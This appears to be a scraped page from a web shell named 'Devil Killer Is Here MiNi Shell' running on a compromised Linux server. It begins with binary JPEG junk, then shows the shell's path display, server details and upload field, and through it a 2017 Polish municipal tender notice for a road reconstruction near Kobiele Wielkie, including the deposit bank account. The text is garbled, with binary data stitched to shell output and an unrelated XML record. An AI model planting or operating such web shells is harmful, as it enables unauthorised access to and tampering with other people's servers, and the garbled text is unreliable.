JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/frontend/runtime/temp/20170131/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/frontend/runtime/temp/20170131/16862_2017.xml

<?xml version="1.0" encoding="utf-8"?><ZP-400><biuletyn>2017</biuletyn><pozycja>16862</pozycja><data_publikacji>2017-01-31</data_publikacji><nazwa>Gmina Kobiele Wielkie</nazwa><ulica>ul. Reymonta</ulica><nr_domu>79</nr_domu><nr_miesz></nr_miesz><miejscowosc>Kobiele Wielkie</miejscowosc><kod_poczt>97524 </kod_poczt><panstwo>Polska</panstwo><wojewodztwo>łódzkie</wojewodztwo><tel>0-44 6814412</tel><fax>0-44 6810593</fax><email>starosteckip25@wp.pl</email><internet></internet><adres_strony_internetowej_narzedzia></adres_strony_internetowej_narzedzia><adres_strony_url>http://www.bip.kobielewielkie.pl</adres_strony_url><podmiot2c></podmiot2c><regon>59064803700000</regon><e_mail></e_mail><ogloszenie>Ogłoszenie o zamówieniu</ogloszenie><czy_obowiazkowa>T</czy_obowiazkowa><zamieszczanie_obowiazkowe>T</zamieszczanie_obowiazkowe><nazwa_projektu_programu>Projekt jest współfinansowany ze środków Unii Europejskiej w ramach Programu Rozwoju Obszarów Wiejskich na lata 2014-2020. Operacja typu ,,Budowa lub modernizacja dróg lokalnych" w ramach poddziałania ,,Wsparcie inwestycji związanych z tworzeniem, ulepszeniem lub rozbudową wszystkich rodzajów małej infrastruktury, w tym inwestycji w energię odnawialną i w oszczędzanie energii" w ramach działania ,,Podstawowe usługi i odnowa wsi na obszarach wiejskich", objętego Programem Rozwoju Obszarów Wiejskich na lata 2014-2020.</nazwa_projektu_programu><czy_ubiegac_zaklady_pracy /><minimalny_procent_zatrudnienia></minimalny_procent_zatrudnienia><czy_przeprowadza_centralny_zamawiajacy /><czy_przeprowadza_podmiot_zamawiajacy_powierzyl /><zamawiajacy_powierzyl></zamawiajacy_powierzyl><czy_przeprowadza_wapolnie /><przeprowadza_wapolnie_podmiot1></przeprowadza_wapolnie_podmiot1><przeprowadza_wapolnie_podmiot2></przeprowadza_wapolnie_podmiot2><czy_przeprowadza_zamawiajacy_z_eu /><postepowanie_wspolne_tresc></postepowanie_wspolne_tresc><informacje_dodatkowe_zamawiajacy></informacje_dodatkowe_zamawiajacy><dotyczy>1</dotyczy><adres_dyn_zak></adres_dyn_zak><rodzaj_zam>administracja samorządowa</rodzaj_zam><wspolne_udzielanie_zamowienia></wspolne_udzielanie_zamowienia><czy_dostep_dokumentow_zamowienia>T</czy_dostep_dokumentow_zamowienia><dostep_dokumentow_zamowienia>http://www.bip.kobielewielkie.pl</dostep_dokumentow_zamowienia><czy_zamieszczona_bedzie_specyfikacja>T</czy_zamieszczona_bedzie_specyfikacja><zamieszczona_bedzie_specyfikacja>http://www.bip.kobielewielkie.pl/</zamieszczona_bedzie_specyfikacja><czy_dostep_do_dokumentow_ograniczony /><czy_wymagane_przeslanie_ofert>T</czy_wymagane_przeslanie_ofert><wymagane_przeslanie_ofert_inny>pisemnie</wymagane_przeslanie_ofert_inny><czy_podzielone_na_czesci>T</czy_podzielone_na_czesci><oferty_lub_wnioski>Wszystkie</oferty_lub_wnioski><maksymalna_liczba_czesci></maksymalna_liczba_czesci><zastrezega_prawo_grup_czesci></zastrezega_prawo_grup_czesci><maksymalna_liczba_czesci_jednemu_wykonawcy></maksymalna_liczba_czesci_jednemu_wykonawcy><dostep_do_dokumentow_ograniczony></dostep_do_dokumentow_ograniczony><czy_oferty_wnioski_dostepne /><oferty_wnioski_dostepne></oferty_wnioski_dostepne><czy_dopuszczone_wymagane_przeslanie_ofert /><dopuszczone_wymagane_przeslanie_ofert_inny></dopuszczone_wymagane_przeslanie_ofert_inny><dopuszczone_wymagane_przeslanie_ofert_adres>Gmina Kobiele Wielkie; 97-524 Kobiele Wielkie ul. Reymonta 79</dopuszczone_wymagane_przeslanie_ofert_adres><czy_komunikacja_elektroniczna_wymaga /><komunikacja_elektroniczna_wymaga></komunikacja_elektroniczna_wymaga><wymagania_dotyczace_rejestracji_wyk_aukcja></wymagania_dotyczace_rejestracji_wyk_aukcja><nazwa_zamowienia>Przebudowa drogi gminnej Kobiele Małe – Łowicz, gmina Kobiele Wielkie
</nazwa_zamowienia><numer_referencyjny>RIGI.271.1.1.2017</numer_referencyjny><czy_dialog_techniczny /><rodz_zam>B</rodz_zam><przedmiot_zam>3.1) Przedmiotem zamówienia jest przebudowa drogi gminnej Kobiele Małe – Łowicz, gmina Kobiele Wielkie wraz z wykonaniem oznakowania pionowego.
Część 1 zamówienia:
Zakres robót
Zakres robót obejmuje przebudowę drogi gminnej relacji Kobiele Małe – Łowicz, długości     4 591,44 mb zgodnie z zakresem wskazanym na projekcie zagospodarowania.
Zaprojektowano drogę klasy L przystosowaną do obciążenie ruchem KR1, w tym jezdnię szerokości 4,5 mb o nawierzchni bitumicznej wraz z poboczem utwardzonym szerokości 0,75 mb z lokalnymi zwężeniami (w miejscach zwężeń utrzymane będzie istniejące pobocze gruntowe).
Niweleta nowoprojektowanej nawierzchni dostosowana do istniejącej. 
Przed przystąpieniem do wykonywania warstwy wyrównawczej należy dokonać lokalnych napraw ubytków.
Odwodnienie pasa drogowego powierzchniowe do istniejących rowów przydrożnych.
Konstrukcja drogi
Zaprojektowano jezdnie o nawierzchni bitumicznej z dwustronnym spadkiem poprzecznym 2%.
Konstrukcja jezdni na poszerzeniu
- warstwa ścieralna z betonu asfaltowego AC 11S KR1 gr. 4cm
- warstwa wyrównawcza z betonu asfaltowego AC 16W KR1 śr. gr. 5cm (od km 0+000,00 do km 3+060,00)
- geowłóknina wzmacniana włóknem szklanym szer. 1,0 mb
- warstwa wiążąca z betonu asfaltowego AC 16W KR1 gr. 5cm
- podbudowa zasadnicza z kruszywa łamanego 0/63mm gr. 30 cm
- warstwa odsączająca z piasku gr. 10 cm


Konstrukcja jezdni od km 0+000,00 do km 3+060,00
- warstwa ścieralna z betonu asfaltowego AC 11S KR1 gr. 4cm
- warstwa wyrównawcza z betonu asfaltowego AC 16W KR1 śr. gr. 5cm
Konstrukcja jezdni od km 3+060,00 do km 4+591,44
- warstwa ścieralna z betonu asfaltowego AC 11S KR1 gr. 4cm
Kruszywa powinny spełniać normę PN-B-11112 Kruszywa łamane do nawierzchni drogowych. Warstwy bitumiczne powinny spełniać normę PN-S-96025:2000 Drogi samochodowe i lotniskowe. Nawierzchnie asfaltowe. Wymagania.
Połączenia warstwy ścieralnej z istniejącymi nawierzchniami bitumicznymi dróg należy wykonać przy użyciu taśmy bitumicznej o następujących parametrach:
- gęstość 1,1-1,4 g/cm3
- temperatura mięknienia &gt;90˚C.
Konstrukcja zjazdu
Zaprojektowano remont istniejącego zjazdu poprzez wymianę jego nawierzchni.
Konstrukcja nawierzchni zjazdu
- warstwa ścieralna z betonu asfaltowego AC 11S KR1 gr. 4cm
- warstwa wyrównawcza z betonu asfaltowego AC 16W KR1 śr. gr. 5cm (od km 0+000,00 do km 3+060,00)
- geowłóknina wzmacniana włóknem szklanym szer. 1,0 mb
- warstwa wiążąca z betonu asfaltowego AC 16W KR1 gr. 5cm
- podbudowa zasadnicza z kruszywa łamanego 0/63mm gr. 30 cm
- warstwa odsączająca z piasku gr. 10 cm
Zaprojektowano pobocze zjazdu szerokości 0,75 mb z kruszywa łamanego 0/31,5 mm                  gr. 10 cm.
Konstrukcja poboczy
Zaprojektowano pobocza szerokości 0,75 mb z lokalnymi zwężeniami do granicy pasa drogowego.
W miejscach zwężeń zachowane zostanie istniejące pobocze gruntowe.
Konstrukcja pobocza
Zaprojektowano pobocze o nawierzchni z kruszywa łamanego ze spadkiem poprzecznym 6% - nawierzchnia z kruszywa łamanego 0/31,5 mm gr. 10 cm
Szczegółowy opis przedmiotu zamówienia został zawarty w Rozdziale V SIWZ, na który składają się następujące dokumenty: 
1)	Dokumentacja projektowa 
2)	Specyfikacja techniczna wykonania i odbioru robót 
3)	Przedmiar robót 
Uwaga:
Przedmiar robót został załączony w celach informacyjnych i służy jedynie do opisu przedmiotu zamówienia. Nie stanowi on podstawy do obliczenia ceny przez Wykonawcę.
Część 2 zamówienia:
Przedmiotem zamówienia jest wykonanie oznakowania pionowego drogi gminnej Kobiele Małe – Łowicz, gmina Kobiele Wielkie. Zakres zamówienia obejmuje montaż 34 sztuk słupków z rur stalowych o średnicy 70 mm, 6 sztuk tablic znaków drogowych zakazu, nakazu, ostrzegawczych i informacyjnych o powierzchni ponad 0,3 m2 oraz 28 sztuk tablic znaków drogowych kierunku miejscowości.
Szczegółowy opis przedmiotu zamówienia został zawarty w Rozdziale V SIWZ, na który składają się następujące dokumenty: 
1)	Dokumentacja projektowa (projekt organizacji ruchu) 
2)	Specyfikacja techniczna wykonania i odbioru robót 
3)	Przedmiar robót
3.2) 	Zamawiający informuje, iż zgodnie z art. 29 ust. 3a ustawy Pzp wymaga zatrudnienia na podstawie umowy o pracę przez wykonawcę lub podwykonawców lub dalszych podwykonawców, osób wykonujących wszelkie roboty drogowe w trakcie realizacji zamówienia. 
Zastrzeżenie nie dotyczy osób wykonujących czynności: kierownika budowy, kierowników robót, dostawców materiałów na budowę, geodetów. 
3.3) 	W trakcie realizacji zamówienia zamawiający uprawniony jest do wykonywania czynności kontrolnych wobec Wykonawcy odnośnie spełniania przez Wykonawcę lub podwykonawcę wymogu zatrudnienia na podstawie umowy o pracę osób wykonujących wskazane w punkcie 3.2) SIWZ czynności. Zamawiający uprawniony jest w szczególności do: 
a)	żądania oświadczeń w zakresie potwierdzenia spełniania ww. wymogów                  i dokonywania ich oceny, 
b)	żądania wyjaśnień i dokumentów w przypadku wątpliwości w zakresie potwierdzenia spełniania ww. wymogów, 
c)	przeprowadzania kontroli na miejscu wykonywania świadczenia. 
3.4) 	W trakcie realizacji zamówienia na każde wezwanie zamawiającego w wyznaczonym w tym wezwaniu terminie wykonawca przedłoży zamawiającemu wskazane poniżej dowody w celu potwierdzenia spełnienia wymogu zatrudnienia na podstawie umowy              o pracę przez wykonawcę lub podwykonawcę osób wykonujących wskazane                         w punkcie 3.2) SIWZ czynności w trakcie realizacji zamówienia - oświadczenie Wykonawcy lub podwykonawcy o zatrudnieniu na podstawie umowy o pracę osób wykonujących czynności, których dotyczy wezwanie zamawiającego. Oświadczenie to powinno zawierać w szczególności: dokładne określenie podmiotu składającego oświadczenie, datę złożenia oświadczenia, wskazanie, że objęte wezwaniem czynności wykonują osoby zatrudnione na podstawie umowy o pracę wraz ze wskazaniem liczby tych osób, rodzaju umowy o pracę i wymiaru etatu oraz podpis osoby uprawnionej do złożenia oświadczenia w imieniu wykonawcy lub podwykonawcy – z wykorzystaniem wzoru stanowiącym załącznik do SIWZ (projektu umowy).
3.5) 	W przypadku uzasadnionych wątpliwości co do spełniania przez Wykonawcę lub podwykonawcę wymogu zatrudnienia na podstawie umowy o pracę osób wykonujących wskazane w punkcie 3.2) SIWZ czynności, po złożeniu wymaganego przez Zamawiającego oświadczenia przez wykonawcę lub podwykonawcę, zamawiający może żądać od Wykonawcy lub podwykonawcy:
a)	poświadczoną za zgodność z oryginałem odpowiednio przez wykonawcę lub podwykonawcę kopię umowy/umów o pracę osób wykonujących w trakcie realizacji zamówienia czynności, których dotyczy ww. oświadczenie wykonawcy lub podwykonawcy (wraz z dokumentem regulującym zakres obowiązków, jeżeli został sporządzony). Kopia umowy/umów powinna zostać zanonimizowana                     w sposób zapewniający ochronę danych osobowych pracowników, zgodnie                       z przepisami ustawy z dnia 29 sierpnia 1997 r. o ochronie danych osobowych                    (tj. w szczególności bez imion, nazwisk, adresów, nr PESEL pracowników). Informacje takie jak: data zawarcia umowy, rodzaj umowy o pracę i wymiar etatu powinny być możliwe do zidentyfikowania; 
b)	zaświadczenie właściwego oddziału ZUS, potwierdzające opłacanie przez wykonawcę lub podwykonawcę składek na ubezpieczenia społeczne i zdrowotne                z tytułu zatrudnienia na podstawie umów o pracę za ostatni okres rozliczeniowy; 
c)	poświadczoną za zgodność z oryginałem odpowiednio przez wykonawcę lub podwykonawcę kopię dowodu potwierdzającego zgłoszenie pracownika przez pracodawcę do ubezpieczeń, zanonimizowaną w sposób zapewniający ochronę danych osobowych pracowników, zgodnie z przepisami ustawy z dnia 29 sierpnia 1997 r. o ochronie danych osobowych. 
3.6) 	Nieprzedłożenie przez Wykonawcę Dokumentów w terminie wskazanym przez Zamawiającego zgodnie z pkt 3.4), 3.5) SIWZ, bądź też przedstawienie Dokumentów, które nie będą potwierdzać spełnienia wymagań, o których mowa w pkt 3.2) SIWZ będzie traktowane jako niewypełnienie obowiązku zatrudnienia osób na podstawie umowy o pracę. 
3.7) 	Za niedotrzymanie wymogu zatrudnienia osób, o których mowa w pkt 3.2) SIWZ na podstawie umowy o pracę w rozumieniu przepisu Kodeksu Pracy – Wykonawca zapłaci Zamawiającemu kary umowne w wysokości 3.000,00 zł za każdy stwierdzony przypadek skierowania do wykonywania prac osoby nie zatrudnionej na podstawie umowy o pracę w rozumieniu przepisów Kodeksu Pracy (kara może być nakładana wielokrotnie wobec tej samej osoby, jeżeli Zamawiający podczas kolejnej kontroli stwierdzi, że nie jest ona zatrudniona na umowę o pracę). 
3.8) 	Zamawiający zastrzega sobie możliwość kontroli zatrudnienia ww. osób przez okres realizacji wykonywanych przez nich czynności. 
3.9) 	W przypadku uniemożliwienia Zamawiającemu kontroli przez Wykonawcę Zamawiającemu obowiązku, o którym mowa w pkt 3.2) Zamawiającemu przysługuje kara umowna w wysokości 3.000,00 zł za każde uniemożliwienie przeprowadzenia takiej kontroli. 
3.10) 	W przypadku uzasadnionych wątpliwości co do przestrzegania prawa pracy przez wykonawcę lub podwykonawcę, zamawiający może zwrócić się o przeprowadzenie kontroli przez Państwową Inspekcję Pracy.
</przedmiot_zam><cpv1c>45233220-7</cpv1c><cpv2c>45316213-1</cpv2c><okres2c>31/08/2017</okres2c><szacunkowa_wart_zam_calosc></szacunkowa_wart_zam_calosc><waluta_calosc></waluta_calosc><czy_przewiduje_udzielenie_zamowien_67>N</czy_przewiduje_udzielenie_zamowien_67><czy_przewiduje_udzielenie_zamowien_67_tekst></czy_przewiduje_udzielenie_zamowien_67_tekst><czy_czesci /><czy_czesci_wymaga /><ilosc_czesci></ilosc_czesci><ilosc_czesci_max></ilosc_czesci_max><czy_wariant /><czy_uzup /><zam_uzupelniajace></zam_uzupelniajace><czas>
        O
      </czas><czas_dni></czas_dni><czas_mies></czas_mies><data_roz></data_roz><data_zak></data_zak><ii_2_lub_temp></ii_2_lub_temp><informacje_na_temat_katalogow></informacje_na_temat_katalogow><okreslenie_warunkow>Zamawiający nie stawia szczegółowych wymagań w zakresie spełniania tego warunku.</okreslenie_warunkow><informacje_dodatkowe_okreslenie_warunkow></informacje_dodatkowe_okreslenie_warunkow><sytuacja_finansowa_okreslenie_warunkow>Część 1 zamówienia:
Zamawiający stawia szczegółowe minimalne wymagania w zakresie oceny tych zdolności. O udzielenie zamówienia mogą się ubiegać Wykonawcy, którzy wykażą minimalne poziomy zdolności w zakresie sytuacji finansowej tj. Wykonawcy, którzy posiadają środki finansowe lub zdolność kredytową w kwocie nie mniejszej niż  2.200.000,00 zł (słownie: dwa miliony dwieście  tysięcy złotych 00/100).
Uwaga:
Wartości podane w walutach innych niż wskazane przez Zamawiającego wykonawca przeliczy wg średniego kursu NBP na dzień wystawienia dokumentu.
Wykonawca potwierdza spełnianie warunku w pierwszej kolejności poprzez złożenie wraz                     z ofertą Oświadczenia własnego,  o którym mowa w części 7 ust. 1 SIWZ.
Część 2 zamówienia:
Zamawiający nie stawia szczegółowych wymagań w zakresie spełniania tego warunku.
</sytuacja_finansowa_okreslenie_warunkow><sytuacja_finansowa_informacje_dodatkowe></sytuacja_finansowa_informacje_dodatkowe><zdolnosc_techniczna_okreslenie_warunkow>Część 1 zamówienia:
Zamawiający stawia szczegółowe wymagania w zakresie oceny tych zdolności                             tj. o udzielenie zamówienia mogą ubiegać się wykonawcy, którzy wykażą minimalne poziomy zdolności w zakresie osób, które zostaną skierowane przez wykonawcę do realizacji zamówienia tj. którzy wykażą, iż dysponują osobą, która pełnić będzie funkcję kierownika budowy posiadającą uprawnienia do kierowania robotami budowlanymi                      w specjalności drogowej bez ograniczeń określone przepisami ustawy z dnia 7 lipca 1994 r. Prawo budowlane (Dz. U. z 2016r., poz. 290 ze zm.) i rozporządzenia Ministra Infrastruktury i Rozwoju z dnia 11 września 2014 r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2014 r. poz. 1278) lub odpowiadające im uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów upoważniające do kierowania robotami budowlanymi w wyżej określonym zakresie. 

Uwaga:
Wykonawca w celu wykazania spełniania w/w warunku może wskazać osobę będącą obywatelem państwa członkowskiego, która nabyła kwalifikacje zawodowe do wykonywania działalności w budownictwie, równoznacznej wykonywaniu samodzielnych funkcji technicznych w budownictwie na terytorium Rzeczypospolitej Polskiej, pod warunkiem, że osoba ta posiada decyzję o uznaniu kwalifikacji zawodowych (którą przedstawi Zamawiającemu przed zawarciem umowy) i prawo wykonywania samodzielnych funkcji technicznych w budownictwie. 
Wykonawca potwierdza spełnianie warunku w pierwszej kolejności poprzez złożenie wraz                z ofertą Oświadczenia własnego,  o którym mowa w części 7 ust. 1 SIWZ.
Część 2 zamówienia:
Zamawiający nie stawia szczegółowych wymagań w zakresie spełniania tego warunku.</zdolnosc_techniczna_okreslenie_warunkow><zdolnosc_techniczna_informacje_dodatkowe></zdolnosc_techniczna_informacje_dodatkowe><czy_zdolnosc_techniczna_wymaga_wykonawcow>T</czy_zdolnosc_techniczna_wymaga_wykonawcow><czy_zamawiajacy_przewiduje_wykluczenie>T</czy_zamawiajacy_przewiduje_wykluczenie><art_24_ust_5_pkt_1>T</art_24_ust_5_pkt_1><art_24_ust_5_pkt_2 /><art_24_ust_5_pkt_3 /><art_24_ust_5_pkt_4>T</art_24_ust_5_pkt_4><art_24_ust_5_pkt_5 /><art_24_ust_5_pkt_6 /><art_24_ust_5_pkt_7 /><art_24_ust_5_pkt_8 /><czy_oswiadczenie_niepodleganiu_wykluczenia>T</czy_oswiadczenie_niepodleganiu_wykluczenia><czy_oswiadczenie_spelnienie_kryteriow /><zaliczka /><uprawnienie></uprawnienie><wiedza></wiedza><potencjal></potencjal><zdolne></zdolne><sytuacja></sytuacja><sprawozdanie_calosc></sprawozdanie_calosc><lata_obrotowe></lata_obrotowe><oswiadczenie_potwierdzenia_1 /><oswiadczenie_potwierdzenia_2 /><oswiadczenie_potwierdzenia_3 /><oswiadczenie_potwierdzenia_4 /><oswiadczenie_potwierdzenia_5 /><oswiadczenie_potwierdzenia_6 /><oswiadczenie_potwierdzenia_7 /><oswiadczenie_potwierdzenia_8 /><oswiadczenie_potwierdzenia_9 /><oswiadczenie_potwierdzenia_10 /><oswiadczenie_wykluczenia_1 /><oswiadczenie_wykluczenia_2 /><oswiadczenie_wykluczenia_3 /><oswiadczenie_wykluczenia_4 /><oswiadczenie_wykluczenia_5 /><oswiadczenie_wykluczenia_6 /><oswiadczenie_wykluczenia_7 /><dok_podm_zag_1 /><dok_podm_zag_2 /><dok_podm_zag_3 /><dok_podm_zag_4 /><dok_potw_1 /><dok_potw_2 /><dok_potw_3 /><dok_potw_4 /><dok_potw_5 /><dok_potw_6 /><inne_dok_potw></inne_dok_potw><inne_dokumenty></inne_dokumenty><niepelnosprawne /><oswiadczenie_przedlozyc /><inne_dokumenty></inne_dokumenty><wykaz_dokumentow_zaswiadczen></wykaz_dokumentow_zaswiadczen><zakresie_warunkow_udzialu>Oświadczenia i dokumenty potwierdzające spełnianie warunków udziału                       w postępowaniu dla Części 1 zamówienia:
a)	wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz                               z informacjami na te¬mat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówie¬nia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami                              – z wykorzystaniem wzoru określonego w Rozdziale III SIWZ, 
b)	informacja banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzająca wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, w okresie nie wcześniejszym                         niż 1 miesiąc przed upływem terminu składania ofert.
Oświadczenia i dokumenty potwierdzające spełnianie warunków udziału                       w postępowaniu dla Części 2 zamówienia:
Nie wymagane.
</zakresie_warunkow_udzialu><zakresie_kryteriow_selekcji></zakresie_kryteriow_selekcji><inne_dokumenty_niewymienione>1. Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu, w stosownych sytuacjach oraz w odniesieniu do konkretnego zamówienia, lub jego części, polegać na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej innych podmiotów, niezależnie od 	charakteru prawnego łączących go z nim stosunków prawnych. 
2. Wykonawca, który polega na zdolnościach lub sytuacji innych podmiotów, musi udowodnić zamawiającemu, że realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów, w szczególności przedstawiając zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia. Zobowiązanie, o którym mowa w zdaniu pierwszym wykonawca załącza do oferty w formie pisemnej.
3. Z dokumentu (np. zobowiązania), o którym mowa w pkt. 5.3 musi wynikać                   w szczególności:
1)	zakres dostępnych wykonawcy zasobów innego podmiotu;
2)	sposób wykorzystania zasobów innego podmiotu, przez wykonawcę, przy wykonywaniu zamówienia publicznego;
3)	zakres i okres udziału innego podmiotu przy wykonywaniu zamówienia publicznego;
4)	czy podmiot, na zdolnościach którego wykonawca polega w odniesieniu do warunków udziału w postępowaniu dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, zrealizuje roboty budowlane lub usługi, których wskazane zdolności dotyczą.

4. Wykonawca, w terminie 3 dni od zamieszczenia na stronie internetowej informacji z otwarcia ofert, o której mowa w art. 86 ust. 3 Pzp, bez uprzedniego wezwania przez zamawiającego, przekazuje zamawiającemu oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 1 pkt 23 Pzp z innym wykonawcą lub wykonawcami, którzy złożyli oferty lub oferty częściowe. Wraz ze złożeniem oświadczenia, wykonawca może przedstawić dowody, że powiązania z innym wykonawcą nie prowadzą do zakłócenia konkurencji                              w postępowaniu o udzielenie zamówienia. 
</inne_dokumenty_niewymienione><wykaz_potwierdzenie_okolicznosci></wykaz_potwierdzenie_okolicznosci><wadium>1.	Oferta składana na wykonanie Części 1 zamówienia musi być zabezpieczona wadium w wysokości: 35.000,00 zł (słownie: trzydzieści pięć tysięcy złotych).
2.	Wadium może być wniesione w:
1)	pieniądzu;
2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej; z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
3)	gwarancjach bankowych;
4)	gwarancjach ubezpieczeniowych;
5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju (Dz. U. z 2016r. poz. 359 ze zm.).
3.	Termin wnoszenia wadium upływa wraz z terminem składania ofert.
4.	Wadium wnoszone w pieniądzu należy wpłacać przelewem na rachunek bankowy Zamawiającego w Banku Spółdzielczym Żytno Oddział w Kobielach Wielkich.
Nr rachunku: 60 8267 1022 2002 2000 0589 0010
z dopiskiem: Wadium – „Przebudowa drogi gminnej Kobiele Małe – Łowicz,  gmina Kobiele Wielkie”
5.	Wadium wniesione w pieniądzu uważa się za wniesione w sposób prawidłowy, gdy środki pieniężne wpłyną na konto zamawiającego przed upływem terminu składnia ofert.
